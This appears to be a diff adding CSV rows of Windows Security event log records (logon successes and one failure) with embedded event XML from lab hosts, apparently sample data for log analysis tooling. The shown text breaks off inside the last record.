+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:25.377120Z"">
+    </TimeCreated>
+    <EventRecordID>137223</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""712"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x25c</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4625</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8010000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:23.627952Z"">
+    </TimeCreated>
+    <EventRecordID>137222</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""Status"">0xc000006d</Data>
+    <Data Name=""FailureReason"">%%2313</Data>
+    <Data Name=""SubStatus"">0xc000006a</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:25.097874Z"">
+    </TimeCreated>
+    <EventRecordID>2988550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x568d99</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64229</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.920903Z"">
+    </TimeCreated>
+    <EventRecordID>2988547</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56874b</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64227</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:22.906195Z"">
+    </TimeCreated>
+    <EventRecordID>2988544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x5686d9</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64226</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.521162Z"">
+    </TimeCreated>
+    <EventRecordID>2988535</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567758</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:20.450493Z"">
+    </TimeCreated>
+    <EventRecordID>2988529</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2908"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-220106</Data>
+    <Data Name=""TargetUserName"">samir</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x567515</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50251</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.725408Z"">
+    </TimeCreated>
+    <EventRecordID>2988525</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56738f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64223</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.637236Z"">
+    </TimeCreated>
+    <EventRecordID>2988522</EventRecordID>
+    <Correlation ActivityID=""2654C2A7-231C-0002-BAC2-54261C23D801"">
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-84104</Data>
+    <Data Name=""TargetUserName"">02694W-WIN10$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x567343</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">429CA5A3-EDFC-5657-17C3-C050C7B047F4</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50250</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:17.194652Z"">
+    </TimeCreated>
+    <EventRecordID>772611</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""2996"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1137987</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50107</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.870643Z"">
+    </TimeCreated>
+    <EventRecordID>772609</EventRecordID>
+    <Correlation ActivityID=""E671C39D-919D-0001-B2C3-71E69D91D601"">
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""SubjectDomainName"">3B</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x244</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.697736Z"">
+    </TimeCreated>
+    <EventRecordID>772607</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1136e95</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50106</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
